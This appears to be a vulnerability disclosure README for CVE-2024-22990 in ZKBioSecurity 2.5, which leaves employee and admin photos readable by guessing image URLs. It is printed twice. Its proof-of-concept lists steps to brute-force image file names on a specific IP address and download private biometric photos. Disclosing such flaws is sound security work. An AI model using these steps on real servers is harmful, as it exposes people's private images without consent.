whiteman007/CVE-2024-22990

## CVE-2024-22990
CVE ID: CVE-2024-22990
Vendor of Product: zkbioSecurity - 2.5
Description: Allowing unauthorized access to sensitive images without proper security permissions. The vulnerability manifests when a site administrator adds a user or an employee captures their picture. Subsequently, any attacker can view all images by guessing the image URLs, circumventing security measures.
Vulnerability Type: misconfiguration
Severity: High

poc
> [Attack Vectors]
> can any attacker show and download private images admin and employe but get the path
> 1-go to http://58.23.12.98:5888/ the demo
> 2-http://58.23.12.98:5888/auth_files/biophoto/40/ the path
> 3-brute force to find the name images im find imgs 1.jpg
> 4-you can show the images http://58.23.12.98:5888/auth_files/biophoto/40/1.jpg
> http://58.23.12.98:5888/auth_files/photo/40/1.jpg
> the exploit can use by hacker to leak database or leaks images users
>
	CVE ID: CVE-2024-22990
	Vendor of Product: zkbioSecurity - 2.5
	Description: Allowing unauthorized access to sensitive images without proper security permissions. The vulnerability manifests when a site administrator adds a user or an employee captures their picture. Subsequently, any attacker can view all images by guessing the image URLs, circumventing security measures.
	Vulnerability Type: misconfiguration
	Severity: High

	poc
	> [Attack Vectors]
	> can any attacker show and download private images admin and employe but get the path
	> 1-go to http://58.23.12.98:5888/ the demo
	> 2-http://58.23.12.98:5888/auth_files/biophoto/40/ the path
	> 3-brute force to find the name images im find imgs 1.jpg
	> 4-you can show the images http://58.23.12.98:5888/auth_files/biophoto/40/1.jpg
	> http://58.23.12.98:5888/auth_files/photo/40/1.jpg
	> the exploit can use by hacker to leak database or leaks images users
	>